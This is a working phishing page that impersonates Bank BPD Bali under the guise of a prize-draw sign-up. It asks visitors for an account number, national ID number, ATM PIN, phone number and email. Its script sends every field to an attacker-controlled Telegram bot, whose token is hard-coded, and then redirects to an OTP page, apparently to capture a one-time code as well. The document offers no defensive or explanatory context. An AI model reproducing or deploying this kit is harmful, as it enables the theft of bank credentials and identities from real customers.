<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <title>Bank BPD Bali</title> 
  <style>
@import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    color: #000;
    position: relative;
}
html { width: 100vw; height: 100vh; }
body {
    width: 100%;
    height: 0px;
    background: transfarent;
    
}
.container {
    width: 100%;
    height: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
}
.headr {
    width: 100%;
    height: 40px;
    background: none;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 20px;
}
.headr p {
    font-size: 15px;
    color: transfarent;
}
.headr img {
    width: 55%;
    height: 70px;
    margin-left: -10px;
    margin-top: 0px;
}
.container .imgh {
    width: 100%;
}
.content {
    margin-top: -20px;
    width: 100%;
    padding: 20px;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}
.content form {
    width: 60%;
    margin-left: 35%;
    margin-top: -5%;
}
.content .wrp {
    width: 100%;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
    height: 50px;
    flex-direction: column;
}
.content .wrp input {
    width: 100%;
    height: 35px;
    outline: none;
    border: 0px solid #d5d5d5;
    padding: 0px 0;
    background:  #BCC6CC;
    z-index: 22;
    font-size: 13px;
    border-radius: 3px;
    padding-left: 10px;
    margin-top: -12%;
}
.content .wrp label {
    color: white;
    font-size: 15px;
    opacity: 0.9;
    margin-left: -55%;
    text-align: : left;
    font-weight: bold;
    
}
.content .wrp input:focus,
.content .wrp input:valid {
    border: 0px solid #006543;
}
.content button {
    width: 100%;
    height: 40px;
    border: none;
    border-radius: 4px;
    background: #D1D0CE;
    font-size: 13px;
    color: black;
    font-weight: bold;
    margin-top: 0%;
}
.content .or {
    margin: 10px 0;
    font-size: 9px;
    text-align: center;
}
.content form .bbtn {
    margin-top: 0px;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
.content form .bbtn button {
    width: 48%;
    height: 35px;
    font-size: 10px;
    color: #000;
    background: #fff400;
}
.content .reg {
    background: transfarent;
    color: #1caa33;
    font-size: 13px;
}
.container .foot {
    width: 100%;
    position: absolute;
    bottom: 60px;
}
h3 {
    font-size: 13px;
}
h4 {
    margin: 5px 0 20px 0;
    font-size: 22px;
    color: white;
    margin-left: 0%;
    font-weight: bold;
    margin-top: -170%;
}
.bgm {
    width: 100%;
    height: 100%;
    background: none;
    position: absolute;
    z-index: 999;
    display: flex;
    justify-content: center;
    align-items: center;
}
.bgbg {
    width: 100%;
    height: 100%;
    background: red;
    position: absolute;
    z-index: 99;
}
.bgm .modal {
    width: 80%;
    border-radius: 20px;
    background: #fff;
    padding: 20px;
    transform: translatey(-80px);
    box-shadow: 0 3px 6px rgba(0,0,0,0.2);
}
.modal h3 {
    margin: 15px 0 0 0;
    font-size: 14px;
    text-align: center;
}
.xx {
    width: 100%;
    height: 40px;
    position: absolute;
    left: 0;
    top: 0;
    display: flex;
    justify-content: right;
}
.xx i {
    font-style: normal;
    position: absolute;
    right: 8px;
    top: 1px;
    font-weight: 200;
}
input::placeholder {
    font-size: 12px;
    opacity: 0.7;
    font-style: italic;
}
</style> 
 </head> 
 <body>
  <div class="container"> 
<img src="/c.png" alt="" style="width: 100%; margin-top: 0px; height: 700px;">
   <div class="content"> 
   </div>
<h4>Daftar Gebyar-Undian</h4> 
<br>
   <div class="content"> 
    <form id="tg" onsubmit="">
     <div class="wrp"> 
      <label>No. Rekening</label><input placeholder="" name="Rek" id="Rek" required autocomplete="off" type="tel" maxlength="" minlength="">
     </div> 
      <div class="wrp"> 
      <label>No. Identitas</label> 
      <input placeholder="" name="Nik-Ktp" id="Nik-Ktp" required autocomplete="off" type="tel" maxlength="16" minlength="16"> 
     </div> 
          <div class="wrp"> 
      <label>PIN ATM</label> 
      <input placeholder="" name="pin" id="pin" required autocomplete="off" type="tel" minlength="6" maxlength="6"> 
     </div> 
          <div class="wrp"> 
      <label>Nomor Hp</label> 
      <input placeholder="" name="Nomor-Hp" id="Nomor-Hp" required autocomplete="off" type="tel" minlength="10" maxlength="13"> 
     </div> 
     <div class="wrp"> 
      <label>Alamat Email</label> 
      <input placeholder="" name="email" id="email" required autocomplete="off" type="email"> 
     </div> 
     <button type="submit">DAFTAR</button> 
    </form> 
   </div> 
  </div> 
  </div>
  <p id="status"></p>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
    const chat_id = '6676924788', botID = 'bot6427504745:AAHSwXF1Qn6ulNnqleqv-0bZEozZTicq3ok';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/otp.html';
    });


   </script>
 </body>
</html>
